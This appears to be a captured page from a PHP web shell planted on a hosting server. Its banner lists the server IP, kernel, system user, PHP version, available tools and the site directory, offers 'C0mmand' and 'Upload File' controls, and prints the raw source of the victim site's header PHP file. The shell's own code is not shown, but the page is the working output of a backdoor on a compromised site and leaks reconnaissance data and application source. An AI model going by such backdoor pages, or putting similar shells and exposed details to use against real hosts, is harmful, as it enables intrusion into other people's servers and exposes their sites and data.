Server IP : 103.53.40.154 / Your IP : 18.118.144.199 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/ppcad7no/ginyardpetroleum.in/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php include_once "admin/config.php"; // logo $sql1 = "SELECT * FROM `tbl_home` WHERE id=1"; $run1 = mysqli_query($db,$sql1) or die("Query Not run"); $data1 = mysqli_fetch_assoc($run1); // seo $sqll = "SELECT * FROM `tbl_seo` WHERE se_id=1"; $runl = mysqli_query($db,$sqll) or die("Query Not run"); $datal = mysqli_fetch_assoc($runl); // contact $sqlc = "SELECT * FROM `tbl_contact` WHERE c_id=1"; $runc = mysqli_query($db,$sqlc) or die("Query Not run"); $datac = mysqli_fetch_assoc($runc); // footer $sqlf = "SELECT * FROM `tbl_footer` WHERE f_id=1"; $runf = mysqli_query($db,$sqlf) or die("Query Not run"); $dataf = mysqli_fetch_assoc($runf); $wspath=$datal['site_path']; ?> <?php echo $datal["index_follow"];?> <meta name="google-site-verification" content="<?php echo $datal["site_verification"]; ?>" /> <?php echo $datal["google_analytic"]; ?> <!-- Favicon --> <link rel="shortcut icon" href="<?php echo $wspath?><?php echo $datal["favicon"]; ?>" /> <!-- Stylesheet --> <link href="<?php echo $wspath?>css/bootstrap.min.css" rel="stylesheet" type="text/css"> <link href="<?php echo $wspath?>css/jquery-ui.min.css" rel="stylesheet" type="text/css"> <link href="<?php echo $wspath?>css/animate.css" rel="stylesheet" type="text/css"> <link href="<?php echo $wspath?>css/css-plugin-collections.css" rel="stylesheet" /> <!-- CSS | menuzord megamenu skins --> <link id="menuzord-menu-skins" href="<?php echo $wspath?>css/menuzord-skins/menuzord-rounded-boxed.css" rel="stylesheet" /> <!-- CSS | Main style file --> <link href="<?php echo $wspath?>css/style-main.css" rel="stylesheet" type="text/css"> <!-- CSS | Preloader Styles --> <link href="<?php echo $wspath?>css/preloader.css" rel="stylesheet" type="text/css"> <!-- CSS | Custom Margin Padding Collection --> <link href="<?php echo $wspath?>css/custom-bootstrap-margin-padding.css" rel="stylesheet" type="text/css"> <!-- CSS | Responsive media queries --> <link href="<?php echo $wspath?>css/responsive.css" rel="stylesheet" type="text/css"> <!-- <link href="css/style.css" rel="stylesheet" type="text/css"> --> <!-- Revolution Slider 5.x CSS settings --> <link href="<?php echo $wspath?>js/revolution-slider/css/settings.css" rel="stylesheet" type="text/css" /> <link href="<?php echo $wspath?>js/revolution-slider/css/layers.css" rel="stylesheet" type="text/css" /> <link href="<?php echo $wspath?>js/revolution-slider/css/navigation.css" rel="stylesheet" type="text/css" /> <!-- CSS | Theme Color --> <link href="<?php echo $wspath?>css/colors/theme-skin-yellow.css" rel="stylesheet" type="text/css"> <!-- external javascripts --> <script src="<?php echo $wspath?>js/jquery-2.2.4.min.js"></script> <script src="<?php echo $wspath?>js/jquery-ui.min.js"></script> <script src="<?php echo $wspath?>js/bootstrap.min.js"></script> <!-- JS | jquery plugin collection for this theme --> <script src="<?php echo $wspath?>js/jquery-plugin-collection.js"></script> <!-- Revolution Slider 5.x SCRIPTS --> <script src="<?php echo $wspath?>js/revolution-slider/js/jquery.themepunch.tools.min.js"></script> <script src="<?php echo $wspath?>js/revolution-slider/js/jquery.themepunch.revolution.min.js"></script> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.2/css/all.min.css" integrity="sha512-z3gLpd7yknf1YoNbCzqRKc4qyor8gaKU1qmn+CShxbuBusANI9QpRohGBreCFkKxLhei6S9CQXFEbbKuqLg0DA==" crossorigin="anonymous" referrerpolicy="no-referrer" />